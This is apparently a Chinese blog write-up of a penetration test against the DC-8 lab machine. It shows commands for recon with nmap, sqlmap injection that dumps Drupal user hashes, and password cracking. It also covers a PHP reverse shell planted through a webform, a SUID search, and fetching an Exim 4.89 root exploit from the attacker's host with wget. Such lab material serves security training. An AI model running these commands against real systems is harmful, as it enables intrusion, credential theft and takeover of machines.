DC-8靶机渗透测试

靶机所需环境

  • 目标靶机:DC-8(192.168.160.182)
  • 攻击机:Kali Linux(192.168.160.176)

信息收集

  • 通过扫描成功发现存活的主机;
arp-scan -l

在这里插入图片描述

  • 使用nmap对目标主机进行端口服务扫描,发现开放了80和22端口;
nmap -sV -O 192.168.160.182

在这里插入图片描述

  • 尝试访问80端口,看到页面有没有很熟悉呢?对,自信点就是DC-7😂;

在这里插入图片描述

  • 对页面进行测试发现Contact Us处貌似存在sql注入;

在这里插入图片描述

  • 加单引号进行测试发现页面报错,验证为报错注入;

在这里插入图片描述

报错注入利用

查询数据库

sqlmap -u "http://192.168.160.182/?nid=1*" --dbs --batch

在这里插入图片描述

查询表

sqlmap -u "http://192.168.160.182/?nid=1*" -D "d7db" --tables --batch

在这里插入图片描述

查询字段

sqlmap -u "http://192.168.160.182/?nid=1*" -D "d7db" -T "users" --columns --batch

在这里插入图片描述

查询值

sqlmap -u "http://192.168.160.182/?nid=1*" -D "d7db" -T "users" -C "name,pass" --du
mp --batch

在这里插入图片描述

爆破登录

  • 将获取到的用户和密码保存为pass文件,使用kali自带的john进行爆破,这里进行说明一下可能存在的问题,由于将hash值放在一起好像爆破不出来,也不知道啥子原因,后将hash值分开进行爆破,成功爆破出john密码为trutle

在这里插入图片描述

用户: john
密码: turtle
  • 看到这里可能有小伙伴要问为啥爆破出来的和我的不太一样啦,请往下看;

知识小拓展1

john 文件名 ——> 第一次使用john时正常打印结果;
john --show 文件名 ——> 第二次使用john命令时不会输出结果,可使用–show参数打印上一次的结果;

  • 由于还不知道登录页面在哪里,扫描目录发现有个robots.txt文件;
dirb http://192.168.160.182

在这里插入图片描述

  • 访问看到说不允许访问/user/login目录,咱调皮一点就要访问😜;

在这里插入图片描述

  • 成功登录后台;

在这里插入图片描述

反弹shell

  • 点击Contact Us,然后选择Webform ——> form settings,选择PHP code,然后输入反弹shell的命令;(注:记得写<p>标签,不然会反弹不成功,内容可随意)

在这里插入图片描述

  • kali开启监听,端口为反弹shell的端口,接着保存输入的内容;(注:一定要先开启监听再保存,不然可能会反弹失败)

在这里插入图片描述

  • 点击Contact Us回到页面,随便输入内容提交下;

在这里插入图片描述

  • 页面一直转圈说明成功了,返回kali查看,执行python命令进行交互shell;
python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

权限提升

  • 执行命令发现为www-data权限,查看下SUID权限的命令;
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

  • 发现exim4命令,查看版本发现为exim 4.89

在这里插入图片描述

  • 利用serachsploit查找exim命令的漏洞;

在这里插入图片描述

  • 下载到当前目录后,查看该exp的用法;

在这里插入图片描述
在这里插入图片描述

  • kali开启http服务将exp传输到靶机/tmp目录下;(注:为什么/tmp目录呢?因为在/tmp目录下具有写的权限)
python -m http.server 8000

在这里插入图片描述

wget http://192.168.160.176:8000/46996.sh

在这里插入图片描述

  • 赋予文件权限,并执行命令进行提权操作,发现两个命令都报错了😳;

在这里插入图片描述

  • 查阅资料发现发现这个报错是由于windows下编辑上传到linux下执行导致的;

知识小拓展2

其中类型分为dosunix格式,如果为dos,需要改为unix模式;
执行命令强制转为set ff=unix即可;

  • kali编辑文件Esc + ;然后输入set ff?查看类型,发现为dos类型;

在这里插入图片描述

  • Esc + ;输入set ff=unix

在这里插入图片描述

  • 重复前面操作,开启http服务重新传输一下文件,再赋予文件权限;

在这里插入图片描述

  • 执行第一个命令发现未提权成功;

在这里插入图片描述

  • 尝试第二个命令成功获取root权限;

在这里插入图片描述
在这里插入图片描述
上一篇 > DC-7靶机渗透测试

下一篇 > DC-9靶机渗透测试

以上内容就是DC-8靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值